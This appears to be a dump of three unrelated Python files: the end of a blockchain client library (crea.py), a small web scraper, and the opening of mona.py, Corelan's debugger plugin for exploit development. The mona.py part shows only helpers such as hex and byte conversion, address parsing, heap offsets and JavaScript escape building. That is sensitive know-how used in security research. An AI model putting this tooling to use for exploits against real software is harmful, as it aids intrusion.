log.info(str(e))
elif (owner_key and active_key and memo_key and posting_key):
active_pubkey = PublicKey(
active_key, prefix=self.prefix)
owner_pubkey = PublicKey(
owner_key, prefix=self.prefix)
posting_pubkey = PublicKey(
posting_key, prefix=self.prefix)
memo_pubkey = PublicKey(
memo_key, prefix=self.prefix)
else:
raise ValueError(
"Call incomplete! Provide either a password or public keys!"
)
owner = format(owner_pubkey, self.prefix)
active = format(active_pubkey, self.prefix)
posting = format(posting_pubkey, self.prefix)
memo = format(memo_pubkey, self.prefix)
owner_key_authority = [[owner, 1]]
active_key_authority = [[active, 1]]
posting_key_authority = [[posting, 1]]
owner_accounts_authority = []
active_accounts_authority = []
posting_accounts_authority = []
# additional authorities
for k in additional_owner_keys:
owner_key_authority.append([k, 1])
for k in additional_active_keys:
active_key_authority.append([k, 1])
for k in additional_posting_keys:
posting_key_authority.append([k, 1])
for k in additional_owner_accounts:
addaccount = Account(k, crea_instance=self)
owner_accounts_authority.append([addaccount["name"], 1])
for k in additional_active_accounts:
addaccount = Account(k, crea_instance=self)
active_accounts_authority.append([addaccount["name"], 1])
for k in additional_posting_accounts:
addaccount = Account(k, crea_instance=self)
posting_accounts_authority.append([addaccount["name"], 1])
props = self.get_chain_properties()
if self.hardfork >= 20:
required_fee_crea = Amount(props["account_creation_fee"], crea_instance=self)
else:
required_fee_crea = Amount(props["account_creation_fee"], crea_instance=self) * 30
op = {
"fee": required_fee_crea,
"creator": creator["name"],
"new_account_name": account_name,
'owner': {'account_auths': owner_accounts_authority,
'key_auths': owner_key_authority,
"address_auths": [],
'weight_threshold': 1},
'active': {'account_auths': active_accounts_authority,
'key_auths': active_key_authority,
"address_auths": [],
'weight_threshold': 1},
'posting': {'account_auths': posting_accounts_authority,
'key_auths': posting_key_authority,
"address_auths": [],
'weight_threshold': 1},
'memo_key': memo,
"json_metadata": json_meta or {},
"prefix": self.prefix,
}
op = operations.Account_create(**op)
return self.finalizeOp(op, creator, "active", **kwargs)
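# Hedged usage sketch (account names and password are placeholders; the creator
# account pays the account_creation_fee):
#   c = Crea()
#   c.create_account("newaccount", creator="payingaccount", password="secret")
# All keys are derived from the password; the owner key is only stored in the
# wallet when store_owner_key=True.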
def witness_set_properties(self, wif, owner, props, use_condenser_api=True):
""" Set witness properties
:param str wif: Private signing key
:param dict props: Properties
:param str owner: witness account name
Properties:::
{
"account_creation_fee": x,
"account_subsidy_budget": x,
"account_subsidy_decay": x,
"maximum_block_size": x,
"url": x,
"sbd_exchange_rate": x,
"sbd_interest_rate": x,
"new_signing_key": x
}
"""
owner = Account(owner, crea_instance=self)
try:
PrivateKey(wif, prefix=self.prefix)
except Exception as e:
raise e
props_list = [["key", repr(PrivateKey(wif, prefix=self.prefix).pubkey)]]
for k in props:
props_list.append([k, props[k]])
op = operations.Witness_set_properties({"owner": owner["name"], "props": props_list, "prefix": self.prefix})
tb = TransactionBuilder(use_condenser_api=use_condenser_api, crea_instance=self)
tb.appendOps([op])
tb.appendWif(wif)
tb.sign()
return tb.broadcast()
def witness_update(self, signing_key, url, props, account=None, **kwargs):
""" Creates/updates a witness
:param str signing_key: Public signing key
:param str url: URL
:param dict props: Properties
:param str account: (optional) witness account name
Properties:::
{
"account_creation_fee": "3.000 CREA",
"maximum_block_size": 65536,
"sbd_interest_rate": 0,
}
"""
if not account and config["default_account"]:
account = config["default_account"]
if not account:
raise ValueError("You need to provide an account")
account = Account(account, crea_instance=self)
try:
PublicKey(signing_key, prefix=self.prefix)
except Exception as e:
raise e
if "account_creation_fee" in props:
props["account_creation_fee"] = Amount(props["account_creation_fee"], crea_instance=self)
op = operations.Witness_update(
**{
"owner": account["name"],
"url": url,
"block_signing_key": signing_key,
"props": props,
"fee": Amount(0, self.crea_symbol, crea_instance=self),
"prefix": self.prefix,
})
return self.finalizeOp(op, account, "active", **kwargs)
def _test_weights_treshold(self, authority):
""" This method raises an error if the threshold of an authority cannot
be reached by the weights.
:param dict authority: An authority of an account
:raises ValueError: if the threshold is set too high
"""
weights = 0
for a in authority["account_auths"]:
weights += int(a[1])
for a in authority["key_auths"]:
weights += int(a[1])
if authority["weight_threshold"] > weights:
raise ValueError("Threshold too restrictive!")
if authority["weight_threshold"] == 0:
raise ValueError("Cannot have threshold of 0")
def custom_json(self,
id,
json_data,
required_auths=[],
required_posting_auths=[],
**kwargs):
""" Create a custom json operation
:param str id: identifier for the custom json (max length 32 bytes)
:param json json_data: the json data to put into the custom_json
operation
:param list required_auths: (optional) required auths
:param list required_posting_auths: (optional) posting auths
.. note:: While required_auths and required_posting_auths are both
optional, one of the two is needed in order to send the custom
json.
.. code-block:: python
crea.custom_json("id", "json_data",
required_posting_auths=['account'])
"""
account = None
if len(required_auths):
account = required_auths[0]
elif len(required_posting_auths):
account = required_posting_auths[0]
else:
raise Exception("At least one account needs to be specified")
account = Account(account, full=False, crea_instance=self)
op = operations.Custom_json(
**{
"json": json_data,
"required_auths": required_auths,
"required_posting_auths": required_posting_auths,
"id": id,
"prefix": self.prefix,
})
return self.finalizeOp(op, account, "posting", **kwargs)
def post(self,
title,
body,
author=None,
permlink=None,
reply_identifier=None,
json_metadata=None,
comment_options=None,
community=None,
app=None,
tags=None,
beneficiaries=None,
self_vote=False,
parse_body=False,
**kwargs):
""" Create a new post.
If this post is intended as a reply/comment, `reply_identifier` needs
to be set with the identifier of the parent post/comment (eg.
`@author/permlink`).
Optionally you can also set json_metadata, comment_options and upvote
the newly created post as an author.
Setting category, tags or community will override the values provided
in json_metadata and/or comment_options where appropriate.
:param str title: Title of the post
:param str body: Body of the post/comment
:param str author: Account you are posting from
:param str permlink: Manually set the permlink (defaults to None).
If left empty, it will be derived from title automatically.
:param str reply_identifier: Identifier of the parent post/comment (only
if this post is a reply/comment).
:param json_metadata: JSON meta object that can be attached to
the post.
:type json_metadata: str, dict
:param dict comment_options: JSON options object that can be
attached to the post.
Example::
comment_options = {
'max_accepted_payout': '1000000.000 CBD',
'percent_crea_dollars': 10000,
'allow_votes': True,
'allow_curation_rewards': True,
'extensions': [[0, {
'beneficiaries': [
{'account': 'account1', 'weight': 5000},
{'account': 'account2', 'weight': 5000},
]}
]]
}
:param str community: (Optional) Name of the community we are posting
into. This will also override the community specified in
`json_metadata`.
:param str app: (Optional) Name of the app used for posting.
When not set, crea/<version> is used
:param tags: (Optional) A list of tags to go with the
post. This will also override the tags specified in
`json_metadata`. The first tag will be used as a 'category'. If
provided as a string, it should be space separated.
:type tags: str, list
:param list beneficiaries: (Optional) A list of beneficiaries
for posting reward distribution. This argument overrides
beneficiaries as specified in `comment_options`.
For example, if we would like to split rewards between account1 and
account2::
beneficiaries = [
{'account': 'account1', 'weight': 5000},
{'account': 'account2', 'weight': 5000}
]
:param bool self_vote: (Optional) Upvote the post as author, right after
posting.
:param bool parse_body: (Optional) When set to True, all mentioned users,
used links and images are put into users, links and images array inside
json_metadata. This will override provided links, images and users inside
json_metadata. Hashtags will be added to tags until the tag list reaches five entries.
"""
# prepare json_metadata
json_metadata = json_metadata or {}
if isinstance(json_metadata, str):
json_metadata = json.loads(json_metadata)
# override the community
if community:
json_metadata.update({'community': community})
if app:
json_metadata.update({'app': app})
elif 'app' not in json_metadata:
json_metadata.update({'app': 'crea/%s' % (crea_version)})
if not author and config["default_account"]:
author = config["default_account"]
if not author:
raise ValueError("You need to provide an account")
account = Account(author, crea_instance=self)
# deal with the category and tags
if isinstance(tags, str):
tags = list(set([_f for _f in (re.split("[\W_]", tags)) if _f]))
category = None
tags = tags or json_metadata.get('tags', [])
if parse_body:
def get_urls(mdstring):
return list(set(re.findall('http[s]*://[^\s"><\)\(]+', mdstring)))
def get_users(mdstring):
users = []
for u in re.findall('(^|[^a-zA-Z0-9_!#$%&*@@\/]|(^|[^a-zA-Z0-9_+~.-\/#]))[@@]([a-z][-\.a-z\d]+[a-z\d])', mdstring):
users.append(list(u)[-1])
return users
def get_hashtags(mdstring):
hashtags = []
for t in re.findall('(^|\s)(#[-a-z\d]+)', mdstring):
hashtags.append(list(t)[-1])
return hashtags
users = []
image = []
links = []
for url in get_urls(body):
img_exts = ['.jpg', '.png', '.gif', '.svg', '.jpeg']
if os.path.splitext(url)[1].lower() in img_exts:
image.append(url)
else:
links.append(url)
users = get_users(body)
hashtags = get_hashtags(body)
users = list(set(users).difference(set([author])))
if len(users) > 0:
json_metadata.update({"users": users})
if len(image) > 0:
json_metadata.update({"image": image})
if len(links) > 0:
json_metadata.update({"links": links})
if len(tags) < 5:
for i in range(5 - len(tags)):
if len(hashtags) > i:
tags.append(hashtags[i])
if tags:
# first tag should be a category
category = tags[0]
json_metadata.update({"tags": tags})
# can't provide a category while replying to a post
if reply_identifier and category:
category = None
# deal with replies/categories
if reply_identifier:
parent_author, parent_permlink = resolve_authorperm(
reply_identifier)
if not permlink:
permlink = derive_permlink(title, parent_permlink)
elif category:
parent_permlink = derive_permlink(category)
parent_author = ""
if not permlink:
permlink = derive_permlink(title)
else:
parent_author = ""
parent_permlink = ""
if not permlink:
permlink = derive_permlink(title)
post_op = operations.Comment(
**{
"parent_author": parent_author,
"parent_permlink": parent_permlink,
"author": account["name"],
"permlink": permlink,
"title": title,
"body": body,
"json_metadata": json_metadata
})
ops = [post_op]
# if comment_options are used, add a new op to the transaction
if comment_options or beneficiaries:
comment_op = self._build_comment_options_op(account['name'],
permlink,
comment_options,
beneficiaries)
ops.append(comment_op)
if self_vote:
vote_op = operations.Vote(
**{
'voter': account["name"],
'author': account["name"],
'permlink': permlink,
'weight': CREA_100_PERCENT,
})
ops.append(vote_op)
return self.finalizeOp(ops, account, "posting", **kwargs)
def comment_options(self, options, identifier, beneficiaries=[],
account=None, **kwargs):
""" Set the comment options
:param dict options: The options to define.
:param str identifier: Post identifier
:param list beneficiaries: (optional) list of beneficiaries
:param str account: (optional) the account to allow access
to (defaults to ``default_account``)
For the options, you have these defaults:::
{
"author": "",
"permlink": "",
"max_accepted_payout": "1000000.000 CBD",
"percent_crea_dollars": 10000,
"allow_votes": True,
"allow_curation_rewards": True,
}
"""
if not account and config["default_account"]:
account = config["default_account"]
if not account:
raise ValueError("You need to provide an account")
account = Account(account, crea_instance=self)
author, permlink = resolve_authorperm(identifier)
op = self._build_comment_options_op(author, permlink, options,
beneficiaries)
return self.finalizeOp(op, account, "posting", **kwargs)
def _build_comment_options_op(self, author, permlink, options,
beneficiaries):
options = remove_from_dict(options or {}, [
'max_accepted_payout', 'percent_crea_dollars',
'allow_votes', 'allow_curation_rewards', 'extensions'
], keep_keys=True)
# override beneficiaries extension
if beneficiaries:
# validate schema
# or just simply vo.Schema([{'account': str, 'weight': int}])
weight_sum = 0
for b in beneficiaries:
if 'account' not in b:
raise ValueError(
"beneficiaries need an account field!"
)
if 'weight' not in b:
b['weight'] = CREA_100_PERCENT
if len(b['account']) > 16:
raise ValueError(
"beneficiaries error, account name length >16!"
)
if b['weight'] < 1 or b['weight'] > CREA_100_PERCENT:
raise ValueError(
"beneficiaries error, 1<=weight<=%s!" %
(CREA_100_PERCENT)
)
weight_sum += b['weight']
if weight_sum > CREA_100_PERCENT:
raise ValueError(
"beneficiaries exceed total weight limit %s" %
CREA_100_PERCENT
)
options['beneficiaries'] = beneficiaries
default_max_payout = "1000000.000 %s" % (self.sbd_symbol)
comment_op = operations.Comment_options(
**{
"author":
author,
"permlink":
permlink,
"max_accepted_payout":
options.get("max_accepted_payout", default_max_payout),
"percent_crea_dollars":
int(options.get("percent_crea_dollars", CREA_100_PERCENT)),
"allow_votes":
options.get("allow_votes", True),
"allow_curation_rewards":
options.get("allow_curation_rewards", True),
"extensions":
options.get("extensions", []),
"beneficiaries":
options.get("beneficiaries", []),
"prefix": self.prefix,
})
return comment_op
def get_api_methods(self):
"""Returns all supported api methods"""
return self.rpc.get_methods(api="jsonrpc")
def get_apis(self):
"""Returns all enabled apis"""
api_methods = self.get_api_methods()
api_list = []
for a in api_methods:
api = a.split(".")[0]
if api not in api_list:
api_list.append(api)
return api_list
def _get_asset_symbol(self, asset_id):
""" get the asset symbol from an asset id
:@param int asset_id: 0 -> CBD, 1 -> CREA, 2 -> VESTS
"""
for asset in self.chain_params['chain_assets']:
if asset['id'] == asset_id:
return asset['symbol']
raise KeyError("asset ID not found in chain assets")
@property
def sbd_symbol(self):
""" get the current chains symbol for CBD (e.g. "TBD" on testnet) """
# some networks (e.g. whaleshares) do not have CBD
try:
symbol = self._get_asset_symbol(0)
except KeyError:
symbol = self._get_asset_symbol(1)
return symbol
@property
def crea_symbol(self):
""" get the current chains symbol for CREA (e.g. "TESTS" on testnet) """
return self._get_asset_symbol(1)
@property
def vests_symbol(self):
""" get the current chains symbol for VESTS """
return self._get_asset_symbol(2)
| 42.341701 | 170 | 0.592794 | [
"MIT"
] | creativechain/crea-python-lib | crea/crea.py | 82,655 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
from lxml import html
import requests
page = requests.get('http://stmary-338.com/')
tree = html.fromstring(page.content)
info = tree.xpath('//*[@id="panel-w5840cbe2b571d-0-1-0"]/div/div/h6[1]')
for i in info:
print "ST MARY", i.encode(page.encoding)
| 28.636364 | 72 | 0.68254 | [
"MIT"
] | linuxkay/python | test-stmary.py | 315 | Python |
"""
U{Corelan<https://www.corelan.be>}
Copyright (c) 2011-2017, Peter Van Eeckhoutte - Corelan GCV
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Corelan nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL PETER VAN EECKHOUTTE OR CORELAN GCV BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
$Revision: 577 $
$Id: mona.py 577 2017-07-02 15:18:00Z corelanc0d3r $
"""
__VERSION__ = '2.0'
__REV__ = filter(str.isdigit, '$Revision: 577 $')
__IMM__ = '1.8'
__DEBUGGERAPP__ = ''
arch = 32
win7mode = False
S17_LOGFILE = 'C:\\monaLog.txt'
# try:
# import debugger
# except:
# pass
try:
import immlib as dbglib
from immlib import LogBpHook
__DEBUGGERAPP__ = "Immunity Debugger"
except:
try:
import pykd
import windbglib as dbglib
from windbglib import LogBpHook
dbglib.checkVersion()
arch = dbglib.getArchitecture()
__DEBUGGERAPP__ = "WinDBG"
except SystemExit, e:
print "-Exit."
import sys
sys.exit(e)
except Exception:
try:
import pykd
import x64dbgpylib as dbglib
from x64dbgpylib import LogBpHook
dbglib.checkVersion()
arch = dbglib.getArchitecture()
__DEBUGGERAPP__ = "x64dbg"
#import traceback
except Exception:
print "Do not run this script outside of a debugger !"
#print traceback.format_exc()
import sys
exit(1)
import getopt
try:
#import debugtypes
#import libdatatype
from immutils import *
except:
pass
import os
import re
import sys
import types
import random
import shutil
import struct
import string
import types
import urllib
import inspect
import datetime
import binascii
import itertools
import traceback
import pickle
import json
from operator import itemgetter
from collections import defaultdict, namedtuple
import cProfile
import pstats
import copy
DESC = "Corelan Team exploit development swiss army knife"
#---------------------------------------#
# Global stuff #
#---------------------------------------#
TOP_USERLAND = 0x7fffffff
g_modules={}
MemoryPageACL={}
global CritCache
global vtableCache
global stacklistCache
global segmentlistCache
global VACache
global NtGlobalFlag
global FreeListBitmap
global memProtConstants
global currentArgs
global disasmUpperChecked
global disasmIsUpper
global configFileCache
NtGlobalFlag = -1
FreeListBitmap = {}
memProtConstants = {}
CritCache={}
vtableCache={}
stacklistCache={}
segmentlistCache={}
configFileCache={}
VACache={}
ptr_counter = 0
ptr_to_get = -1
silent = False
ignoremodules = False
noheader = False
dbg = dbglib.Debugger()
disasmUpperChecked = False
disasmIsUpper = False
if __DEBUGGERAPP__ == "WinDBG":
if pykd.getSymbolPath().replace(" ","") == "":
dbg.log("")
dbg.log("** Warning, no symbol path set ! ** ",highlight=1)
sympath = "srv*c:\symbols*http://msdl.microsoft.com/download/symbols"
dbg.log(" I'll set the symbol path to %s" % sympath)
pykd.setSymbolPath(sympath)
dbg.log(" Symbol path set, now reloading symbols...")
dbg.nativeCommand(".reload")
dbg.log(" All set. Please restart WinDBG.")
dbg.log("")
osver = dbg.getOsVersion()
if osver in ["6", "7", "8", "vista", "win7", "2008server", "win8", "win8.1", "win10"]:
win7mode = True
heapgranularity = 8
if arch == 64:
heapgranularity = 16
offset_categories = ["xp", "vista", "win7", "win8", "win10"]
# offset = [x86,x64]
offsets = {
"FrontEndHeap" : {
"xp" : [0x580,0xad8],
"vista" : [0x0d4,0x178],
"win8" : [0x0d0,0x170],
"win10" : {
14393 : [0x0d4,0x178]
}
},
"FrontEndHeapType" : {
"xp" : [0x586,0xae2],
"vista" : [0x0da,0x182],
"win8" : [0x0d6,0x17a],
"win10" : {
14393 : [0x0da,0x182]
}
},
"VirtualAllocdBlocks" : {
"xp" : [0x050,0x090],
"vista" : [0x0a0,0x118],
"win8" : [0x09c,0x110]
},
"SegmentList" : {
"vista" : [0x0a8,0x128],
"win8" : [0x0a4,0x120]
}
}
#---------------------------------------#
# Populate constants #
#---------------------------------------#
memProtConstants["X"] = ["PAGE_EXECUTE",0x10]
memProtConstants["RX"] = ["PAGE_EXECUTE_READ",0x20]
memProtConstants["RWX"] = ["PAGE_EXECUTE_READWRITE",0x40]
memProtConstants["N"] = ["PAGE_NOACCESS",0x1]
memProtConstants["R"] = ["PAGE_READONLY",0x2]
memProtConstants["RW"] = ["PAGE_READWRITE",0x4]
memProtConstants["GUARD"] = ["PAGE_GUARD",0x100]
memProtConstants["NOCACHE"] = ["PAGE_NOCACHE",0x200]
memProtConstants["WC"] = ["PAGE_WRITECOMBINE",0x400]
#---------------------------------------#
# Utility functions #
#---------------------------------------#
def resetGlobals():
"""
Clears all global variables
"""
global CritCache
global vtableCache
global stacklistCache
global segmentlistCache
global VACache
global NtGlobalFlag
global FreeListBitmap
global memProtConstants
global currentArgs
CritCache = None
vtableCache = None
stacklistCache = None
segmentlistCache = None
VACache = None
NtGlobalFlag = None
FreeListBitmap = None
memProtConstants = None
currentArgs = None
disasmUpperChecked = False
return
def toHex(n):
"""
Converts a numeric value to hex (pointer to hex)
Arguments:
n - the value to convert
Return:
A string, representing the value in hex (8 or 16 characters, depending on the architecture)
"""
if arch == 32:
return "%08x" % n
if arch == 64:
return "%016x" % n
def sanitize_module_name(modname):
"""
Sanitizes a module name so it can be used as a variable
"""
return modname.replace(".", "_")
def DwordToBits(srcDword):
"""
Converts a dword into an array of 32 bits
"""
bit_array = []
h_str = "%08x" % srcDword
h_size = len(h_str) * 4
bits = (bin(int(h_str,16))[2:]).zfill(h_size)[::-1]
for bit in bits:
bit_array.append(int(bit))
return bit_array
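# Illustrative note: bits are returned least-significant first, e.g.
#   DwordToBits(0x5) -> [1, 0, 1, 0, 0, ..., 0]   (32 entries in total)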
def getDisasmInstruction(disasmentry):
""" returns instruction string, checks if ASM is uppercase and converts to upper if needed """
instrline = disasmentry.getDisasm()
global disasmUpperChecked
global disasmIsUpper
if disasmUpperChecked:
if not disasmIsUpper:
instrline = instrline.upper()
else:
disasmUpperChecked = True
interim_instr = instrline.upper()
if interim_instr == instrline:
disasmIsUpper = True
else:
disasmIsUpper = False
dbg.log("** It looks like you've configured the debugger to produce lowercase disassembly. Got it, all good **", highlight=1)
instrline = instrline.upper()
return instrline
def multiSplit(thisarg,delimchars):
""" splits a string into an array, based on provided delimeters"""
splitparts = []
thispart = ""
for c in str(thisarg):
if c in delimchars:
thispart = thispart.replace(" ","")
if thispart != "":
splitparts.append(thispart)
splitparts.append(c)
thispart = ""
else:
thispart += c
if thispart != "":
splitparts.append(thispart)
return splitparts
def getAddyArg(argaddy):
"""
Tries to extract an address from a specified argument
addresses and values will be considered hex
(unless you specify 0n before a value)
registers are allowed too
"""
findaddy = 0
addyok = True
addyparts = []
addypartsint = []
delimchars = ["-","+","*","/","(",")","&","|",">","<"]
regs = dbg.getRegs()
thispart = ""
for c in str(argaddy):
if c in delimchars:
thispart = thispart.replace(" ","")
if thispart != "":
addyparts.append(thispart)
addyparts.append(c)
thispart = ""
else:
thispart += c
if thispart != "":
addyparts.append(thispart)
partok = False
for part in addyparts:
cleaned = part
if not part in delimchars:
for x in delimchars:
cleaned = cleaned.replace(x,"")
if cleaned.startswith("[") and cleaned.endswith("]"):
partval,partok = getIntForPart(cleaned.replace("[","").replace("]",""))
if partok:
try:
partval = struct.unpack('<L',dbg.readMemory(partval,4))[0]
except:
partval = 0
partok = False
break
else:
partval,partok = getIntForPart(cleaned)
if not partok:
break
addypartsint.append(partval)
else:
addypartsint.append(part)
if not partok:
break
if not partok:
addyok = False
findval = 0
else:
calcstr = "".join(str(x) for x in addypartsint)
try:
findval = eval(calcstr)
addyok = True
except:
findval = 0
addyok = False
return findval, addyok
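# Illustrative examples of accepted expressions (register/module values depend on
# the debugger state at that point):
#   getAddyArg("esp+0x10")       -> ESP plus 0x10, addyok True
#   getAddyArg("kernel32+200")   -> base of kernel32 plus 0x200
#   getAddyArg("[esp]")          -> dword read from memory at ESP
# Input that cannot be resolved returns (0, False).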
def getIntForPart(part):
"""
Returns the int value associated with an input string
The input string can be a hex value, decimal value, register, modulename, or modulee!functionname
"""
partclean = part
partclean = partclean.upper()
addyok = True
partval = 0
regs = dbg.getRegs()
if partclean in regs:
partval = regs[partclean]
elif partclean.lower() == "heap" or partclean.lower() == "processheap":
partval = getDefaultProcessHeap()
else:
if partclean.lower().startswith("0n"):
partclean = partclean.lower().replace("0n","")
try:
partval = int(partclean)
except:
addyok = False
partval = 0
else:
try:
if not "0x" in partclean.lower():
partclean = "0x" + partclean
partval = int(partclean,16)
except:
addyok = False
partval = 0
if not addyok:
if not "!" in part:
m = getModuleObj(part)
if not m == None:
partval = m.moduleBase
addyok = True
else:
modparts = part.split("!")
modname = modparts[0]
funcname = modparts[1]
m = getFunctionAddress(modname,funcname)
if m > 0:
partval = m
addyok = True
return partval,addyok
def getFunctionAddress(modname,funcname):
"""
Returns the address of the function inside a given module
Relies on EAT data
Returns 0 if nothing found
"""
funcaddy = 0
m = getModuleObj(modname)
if not m == None:
eatlist = m.getEAT()
for f in eatlist:
if funcname == eatlist[f]:
return f
for f in eatlist:
if funcname.lower() == eatlist[f].lower():
return f
return funcaddy
def getFunctionName(addy):
"""
Returns symbol name closest to the specified address
Only works in WinDBG
Returns function name and optional offset
"""
fname = ""
foffset = ""
cmd2run = "ln 0x%08x" % addy
output = dbg.nativeCommand(cmd2run)
for line in output.split("\n"):
if "|" in line:
lineparts = line.split(" ")
partcnt = 0
for p in lineparts:
if not p == "":
if partcnt == 1:
fname = p
break
partcnt += 1
if "+" in fname:
fnameparts = fname.split("+")
if len(fnameparts) > 1:
return fnameparts[0],fnameparts[1]
return fname,foffset
def printDataArray(data,charsperline=16,prefix=""):
maxlen = len(data)
charcnt = 0
charlinecnt = 0
linecnt = 0
thisline = prefix
lineprefix = "%04d - %04d " % (charcnt,charcnt+charsperline-1)
thisline += lineprefix
while charcnt < maxlen:
thisline += data[charcnt:charcnt+1]
charlinecnt += 1
charcnt += 1
if charlinecnt == charsperline or charlinecnt == maxlen:
dbg.log(thisline)
thisline = prefix
lineprefix = "%04d - %04d " % (charcnt,charcnt+charsperline-1)
thisline += lineprefix
charlinecnt = 0
return None
def find_all_copies(tofind,data):
"""
Finds all occurrences of a string in a longer string
Arguments:
tofind - the string to find
data - contains the data to search for all occurrences of 'tofind'
Return:
An array with all locations
"""
position = 0
positions = []
searchstringlen = len(tofind)
maxlen = len(data)
while position < maxlen:
position = data.find(tofind,position)
if position == -1:
break
positions.append(position)
position += searchstringlen
return positions
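# Illustrative example (minimal sketch, no debugger state needed):
#   >>> find_all_copies("AB", "ABxxABxAB")
#   [0, 4, 7]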
def getAllStringOffsets(data,minlen,offsetstart = 0):
asciistrings = {}
for match in re.finditer("(([\x20-\x7e]){%d,})" % minlen,data):
thisloc = match.start() + offsetstart
thisend = match.end() + offsetstart
asciistrings[thisloc] = thisend
return asciistrings
def getAllUnicodeStringOffsets(data,minlen,offsetstart = 0):
unicodestrings = {}
for match in re.finditer("((\x00[\x20-\x7e]){%d,})" % (minlen*2),data):
unicodestrings[offsetstart + match.start()] = (offsetstart + match.end())
return unicodestrings
def stripExtension(fullname):
"""
Removes extension from a filename
(will only remove the last extension)
Arguments :
fullname - the original string
Return:
A string, containing the original string without the last extension
"""
nameparts = fullname.split(".")
if len(nameparts) > 1:
cnt = 0
modname = ""
while cnt < len(nameparts)-1:
modname = modname + nameparts[cnt] + "."
cnt += 1
return modname.strip(".")
return fullname
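# Illustrative example (only the last extension is stripped):
#   >>> stripExtension("kernel32.dll")
#   'kernel32'
#   >>> stripExtension("my.file.txt")
#   'my.file'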
def toHexByte(n):
"""
Converts a numeric value to a hex byte
Arguments:
n - the value to convert (max 255)
Return:
A string, representing the value in hex (1 byte)
"""
return "%02X" % n
def toAsciiOnly(inputstr):
return "".join(i for i in inputstr if ord(i)<128 and ord(i) > 31)
def toAscii(n):
"""
Converts a byte to its ascii equivalent. Null byte = space
Arguments:
n - A string (2 chars) representing the byte to convert to ascii
Return:
A string (one character), representing the ascii equivalent
"""
asciiequival = " "
if n.__class__.__name__ == "int":
n = "%02x" % n
try:
if n != "00":
asciiequival=binascii.a2b_hex(n)
else:
asciiequival = " "
except TypeError:
asciiequival=" "
return asciiequival
def hex2bin(pattern):
"""
Converts a hex string (\\x??\\x??\\x??\\x??) to real hex bytes
Arguments:
pattern - A string representing the bytes to convert
Return:
the bytes
"""
pattern = pattern.replace("\\x", "")
pattern = pattern.replace("\"", "")
pattern = pattern.replace("\'", "")
return ''.join([binascii.a2b_hex(i+j) for i,j in zip(pattern[0::2],pattern[1::2])])
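# Illustrative example (the input uses literal \x notation, as produced by bin2hexstr):
#   >>> hex2bin("\\x41\\x42\\x43\\x44")
#   'ABCD'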
def getVariantType(typenr):
varianttypes = {}
varianttypes[0x0] = "VT_EMPTY"
varianttypes[0x1] = "VT_NULL"
varianttypes[0x2] = "VT_I2"
varianttypes[0x3] = "VT_I4"
varianttypes[0x4] = "VT_R4"
varianttypes[0x5] = "VT_R8"
varianttypes[0x6] = "VT_CY"
varianttypes[0x7] = "VT_DATE"
varianttypes[0x8] = "VT_BSTR"
varianttypes[0x9] = "VT_DISPATCH"
varianttypes[0xA] = "VT_ERROR"
varianttypes[0xB] = "VT_BOOL"
varianttypes[0xC] = "VT_VARIANT"
varianttypes[0xD] = "VT_UNKNOWN"
varianttypes[0xE] = "VT_DECIMAL"
varianttypes[0x10] = "VT_I1"
varianttypes[0x11] = "VT_UI1"
varianttypes[0x12] = "VT_UI2"
varianttypes[0x13] = "VT_UI4"
varianttypes[0x14] = "VT_I8"
varianttypes[0x15] = "VT_UI8"
varianttypes[0x16] = "VT_INT"
varianttypes[0x17] = "VT_UINT"
varianttypes[0x18] = "VT_VOID"
varianttypes[0x19] = "VT_HRESULT"
varianttypes[0x1A] = "VT_PTR"
varianttypes[0x1B] = "VT_SAFEARRAY"
varianttypes[0x1C] = "VT_CARRAY"
varianttypes[0x1D] = "VT_USERDEFINED"
varianttypes[0x1E] = "VT_LPSTR"
varianttypes[0x1F] = "VT_LPWSTR"
varianttypes[0x24] = "VT_RECORD"
varianttypes[0x25] = "VT_INT_PTR"
varianttypes[0x26] = "VT_UINT_PTR"
varianttypes[0x2000] = "VT_ARRAY"
varianttypes[0x4000] = "VT_BYREF"
if typenr in varianttypes:
return varianttypes[typenr]
else:
return ""
def bin2hex(binbytes):
"""
Converts a binary string to a string of space-separated hexadecimal bytes.
"""
return ' '.join('%02x' % ord(c) for c in binbytes)
def bin2hexstr(binbytes):
"""
Converts bytes to a string with hex
Arguments:
binbytes - the input to convert to hex
Return :
string with hex
"""
return ''.join('\\x%02x' % ord(c) for c in binbytes)
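# Illustrative example of both byte-to-hex helpers above (no debugger state needed):
#   >>> bin2hex("ABC")
#   '41 42 43'
#   >>> bin2hexstr("ABC")
#   '\\x41\\x42\\x43'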
def str2js(inputstring):
"""
Converts a string to a javascript string
Arguments:
inputstring - the input string to convert
Return :
string in javascript format
"""
length = len(inputstring)
if length % 2 == 1:
jsmsg = "Warning : odd size given, js pattern will be truncated to " + str(length - 1) + " bytes, it's better use an even size\n"
if not silent:
dbg.logLines(jsmsg,highlight=1)
toreturn=""
for thismatch in re.compile("..").findall(inputstring):
thisunibyte = ""
for thisbyte in thismatch:
thisunibyte = "%02x" % ord(thisbyte) + thisunibyte
toreturn += "%u" + thisunibyte
return toreturn
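# Illustrative example (each pair of bytes becomes one little-endian %u escape):
#   >>> str2js("ABCD")
#   '%u4241%u4443'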
def readJSONDict(filename):
"""
Retrieve stored dict from JSON file
"""
jsondict = {}
with open(filename, 'rb') as infile:
jsondata = infile.read()
